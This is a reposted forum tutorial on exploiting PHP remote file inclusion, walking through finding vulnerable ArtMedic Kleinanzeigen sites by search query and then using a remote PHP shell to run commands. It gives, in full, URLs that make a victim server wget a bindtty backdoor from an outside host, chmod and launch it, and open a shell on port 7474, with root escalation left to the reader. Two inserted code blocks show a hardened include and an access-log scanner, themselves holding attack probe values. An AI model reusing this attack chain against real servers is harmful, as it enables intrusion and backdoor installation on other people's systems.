Exploiting Remote File Inclusion Vulnerabilities

Reposted by xiaoxiao, 2021-03-06

Forum handle: CRACKLOVE

Contributor e-mail: cracklove@zj.com

Contributor QQ number:

Copyright: This article is jointly copyrighted by China Safety Net (http://www.safechina.net) and the author; please credit the source when reproducing it!

Title: Remote File Inclusion Vulnerabilities

Content:

▲ Exploiting Remote File Inclusion Vulnerabilities

*****************************

* Author: CRACKLOVE *

* E-MAIL: CRACKLOVE # zj.com *

* HomePage: N/A, maybe down *

*****************************

1) What is a remote file inclusion vulnerability?

Let's first look at the following code.

<?php

include($page);

?>

Because the $page variable is not filtered at all, and include() does not care whether $page points at a file on the local machine or on a remote server, we can pass a file on a remote server as the value of $page and have it executed with the privileges of the web server.

Two PHP settings make this possible: register_globals must be on (the default before PHP 4.2.0) so that the page query parameter becomes the variable $page, and PHP must be allowed to open URLs in include() (allow_url_fopen, or allow_url_include from PHP 5.2 onwards).

2) Basic use of the vulnerability

Suppose a site's index.php looks like this:

<?php

include($page);

?>

We can then request:

http://siteurl.tld/index.php?page=http://remoteserver/filename

Suppose the file warez.php on the remote server contains:

<?php

system("ls /tmp/");

?>

The vulnerable server downloads warez.php and executes it; put plainly, it lists the contents of /tmp. One caveat: the remote server must hand the file back as plain source rather than running it itself (for example because PHP is not installed there, or because the file carries a non-PHP extension such as .txt or .gif), otherwise the victim only receives the output of ls run on the attacker's own machine.
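The following is an added example and not code from the original article: it places the include() pattern described above beside a hardened replacement that maps the untrusted parameter onto a fixed allow-list and checks the resolved path. The page names, the pages/ directory and the probe values are assumptions made for illustration.

```php
<?php
// Added example, not code from the original article: the include() pattern
// the article describes, beside a hardened replacement. The page names,
// the pages/ directory and the allow-list are assumptions for illustration.

// ---- Vulnerable form (as described above) ----
// With register_globals=On, ?page=http://attacker/x.txt sets $page directly;
// include() then fetches and executes the remote file whenever PHP is allowed
// to open URLs (allow_url_fopen before 5.2, allow_url_include from 5.2 on).
function vulnerable_include(string $page): void
{
    include $page;          // attacker controls both the scheme and the path
}

// ---- Hardened form ----
// 1. Read the parameter explicitly from $_GET; never rely on register_globals.
// 2. Map the untrusted value onto a fixed allow-list; never build a path from it.
// 3. Resolve the result with realpath() and confirm it stays inside the
//    pages directory before including it.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'news'    => 'news.php',
];

// Returns the absolute path to include, or null when the request is refused.
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                        // unknown page name: refuse, do not guess
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $real === false) {
        return null;                        // directory or page file is missing
    }
    // Defence in depth: even an allow-listed entry must resolve inside $baseDir.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

if (PHP_SAPI === 'cli') {
    // Stand-alone demo: build a throwaway pages directory holding only home.php,
    // then probe resolve_page() with a legitimate value and with the kinds of
    // values an attacker would send to the vulnerable form.
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.php', "<?php echo \"home\\n\";\n");
    $probes = [
        'home',                              // allow-listed and present -> path
        'news',                              // allow-listed but file absent -> rejected
        'http://attacker.example/cse.txt',   // remote inclusion attempt -> rejected
        '../../../../etc/passwd',            // traversal -> rejected
        'php://input',                       // stream wrapper -> rejected
    ];
    foreach ($probes as $probe) {
        printf("%-34s => %s\n", $probe, resolve_page($probe, $dir) ?? 'rejected');
    }
    unlink($dir . '/home.php');
    rmdir($dir);
    exit(0);
}

// Web entry point: dispatch on the validated value only.
$requested = $_GET['page'] ?? 'home';
$file = is_string($requested) ? resolve_page($requested, __DIR__ . '/pages') : null;
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Run it from the command line to see the probes, or drop it into a web root with a pages/ directory to use the hardened dispatcher. The allow-list is what does the real work: remote URLs, stream wrappers and traversal sequences never reach include() because they are not keys of PAGES. The realpath() check is a second line of defence for the day someone adds an allow-list entry that points outside the pages directory. On older installations, turning register_globals off and allow_url_fopen (or allow_url_include) off in php.ini removes the two preconditions named above for the whole server.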

3) Practical exercise

Enough talk; now let's get to the hands-on practice, hehe.

(1) Preparation:

1. A site with a remote file inclusion vulnerability

2. A PHP shell

3. A backdoor

For 1, you can keep an eye on the vulnerabilities recently published at www.securiteam.com; there are always some. Here we take the most recent one, the ArtMedic Kleinanzeigen vulnerability.

ArtMedic Kleinanzeigen fails to filter the $site variable in index.php, which results in a remote file inclusion vulnerability. So we can submit the following URL:

http://artmedic-kleinanzeigen-url/path/index.php?site=http://phpshellurl

How do you find sites running ArtMedic Kleinanzeigen? There is a trick here, which I'll explain.

First I go to ArtMedic Kleinanzeigen's official site and find the demo of the program. Clicking any link there leads to a URL of the form http://siteurl.com/index.php?site=anzeigenmaerktestart. So if you search www.google.com for index.php?site=anzeigenmaerktestart, nearly every site running ArtMedic Kleinanzeigen turns up, and we can try them one by one!

For 2, I recommend Data Cha0s PHP Command/SafeMode Exploit 4.1, or Angel's SAPHPSHELL or PHPSPY; all of them work well.

For 3, you can use a port-binding program (bind) and then telnet to the port it binds. You can use the Digit-Labs connect-back backdoor that SAN used before,

but I usually use bindtty, which binds port 7474.

(2) Getting started

1. Submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id. Explanation: cse.gif is the Data Cha0s PHP Command/SafeMode Exploit mentioned above, version 4.1 (given a .gif extension so the attacker's server returns it as plain source instead of executing it); cmd=id queries the identity and privileges of the current user.

Typically the result is uid=99(nobody) gid=99(nobody) groups=99(nobody). The uid is not 0, so it is not a root-level account.

If the command ran at all, the system() function has not been disabled, so we can go ahead and execute commands!

2. Submit http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty (the browser percent-encodes the spaces for you; note that wget's output-file option is a capital -O, while lower-case -o only names a log file).

This downloads bindtty into the /tmp directory. You may ask why /tmp? Because /tmp is world-writable.

3. Once the file is downloaded, we must set its permissions, otherwise it will not run and will complain about missing permissions.

http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty

Now we have permission to execute the bindtty file!

4. Run bindtty

http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty

If it succeeds, it prints: daemon is starting... OK, PID=XXXX.

Since, as noted above, bindtty binds port 7474, we can now telnet to the host on port 7474.

PS: I do not recommend using the Windows command-prompt telnet client; it garbles characters. PuTTY is recommended instead.

5. Escalating to root is your own job. You can find a suitable exploit based on the system information that cse.gif displays.
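Seen from the defender's side, every step of the drill above leaves the same trace in the victim's web-server access log: a request whose include parameter carries a URL (or a PHP stream wrapper) and, when a shell is driven, a cmd= argument riding along inside it. The following is an added example and not code from the original article: a small scanner for that pattern run over constructed access-log lines. The hostnames, addresses, the parameter-name list and the log lines themselves are assumptions made for the demo.

```php
<?php
// Added example, not code from the original article: scan web-server access
// log lines for the request pattern the drill above produces (an include
// parameter whose value is a URL or PHP stream wrapper, optionally carrying a
// cmd= argument for the fetched shell). The log lines below are constructed
// for this demo; hostnames and addresses are placeholders.

// Parameter names commonly handed to include(); a URL in one of these is
// rated high, a URL in any other parameter (a referral link, say) only low.
const INCLUDE_PARAMS = ['page', 'site', 'file', 'inc', 'include', 'path', 'template', 'dir'];

// Leading scheme (http://, ftp://, php://, ...) or a scheme without slashes
// that PHP also accepts as a stream source (data:, expect:).
const WRAPPER_RE = '#^(?:[a-z][a-z0-9+.-]*://|data:|expect:)#i';

const LOG_LINES = [
    '203.0.113.5 - - [06/Mar/2003:10:12:01 +0000] "GET /index.php?site=anzeigenmaerktestart HTTP/1.0" 200 4821',
    '203.0.113.5 - - [06/Mar/2003:10:12:09 +0000] "GET /index.php?site=http://phphot.example/cse.gif?cmd=id HTTP/1.0" 200 512',
    '203.0.113.5 - - [06/Mar/2003:10:12:40 +0000] "GET /index.php?site=http%3A%2F%2Fphphot.example%2Fcse.gif%3Fcmd%3Dwget%20http%3A%2F%2Fphphot.example%2Fbindtty%20-O%20%2Ftmp%2Fbindtty HTTP/1.0" 200 77',
    '198.51.100.9 - - [06/Mar/2003:10:13:00 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.0" 404 210',
    '198.51.100.9 - - [06/Mar/2003:10:13:05 +0000] "GET /index.php?page=php://input HTTP/1.0" 200 88',
    '192.0.2.7 - - [06/Mar/2003:10:14:00 +0000] "GET /index.php?page=contact&ref=https://partner.example/ HTTP/1.0" 200 3002',
];

// Pull method, request target and status out of a common/combined log line.
// Browsers percent-encode spaces, so the request target is a single token.
function parse_request(string $line): ?array
{
    if (!preg_match('/"([A-Z]+) (\S+) HTTP\/[\d.]+" (\d{3})/', $line, $m)) {
        return null;
    }
    $query  = parse_url($m[2], PHP_URL_QUERY);
    $params = [];
    if (is_string($query)) {
        parse_str($query, $params);   // also percent-decodes, so encoded attempts are caught
    }
    return ['method' => $m[1], 'target' => $m[2], 'status' => (int) $m[3], 'params' => $params];
}

// Return a list of findings for one parsed request; an empty list means nothing suspicious.
function classify(array $params): array
{
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;                 // page[]=... style arrays are out of scope here
        }
        $remote    = preg_match(WRAPPER_RE, $value) === 1;
        $traversal = strpos($value, '../') !== false;
        if (!$remote && !$traversal) {
            continue;
        }
        $severity   = in_array(strtolower($name), INCLUDE_PARAMS, true) ? 'high' : 'low';
        $kind       = $remote ? 'remote URL or stream wrapper' : 'directory traversal';
        $findings[] = sprintf('[%s] %s in parameter %s: %s', $severity, $kind, $name, $value);
        // Secondary indicator: a command handed to the fetched shell.
        if ($remote && preg_match('/[?&]cmd=/', $value) === 1) {
            $findings[] = sprintf('[high] command pass-through in parameter %s', $name);
        }
    }
    return $findings;
}

foreach (LOG_LINES as $line) {
    $req = parse_request($line);
    if ($req === null) {
        continue;
    }
    $findings = classify($req['params']);
    printf("%s %s -> %s\n", $req['method'], $req['target'], $findings ? count($findings) . ' finding(s)' : 'clean');
    foreach ($findings as $f) {
        echo "    $f\n";
    }
}
```

Run from the command line, the first line comes out clean, the three cse.gif requests and the two traversal/wrapper probes are rated high, and the last line, where the URL sits in a ref parameter rather than an include parameter, is rated low; that split is what keeps legitimate referral links from drowning the real hits. Two caveats: the access log only shows the inbound request, so the victim fetching cse.gif and bindtty from the attacker's host is visible in DNS or egress logs rather than here, and the target regex assumes the request line contains no raw spaces, which holds for browser-sent requests but not for every hand-crafted one.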

That's about it. If you run into any problems, let me know.

Please credit the original URL when reposting: https://www.9cbs.com/read-102374.html
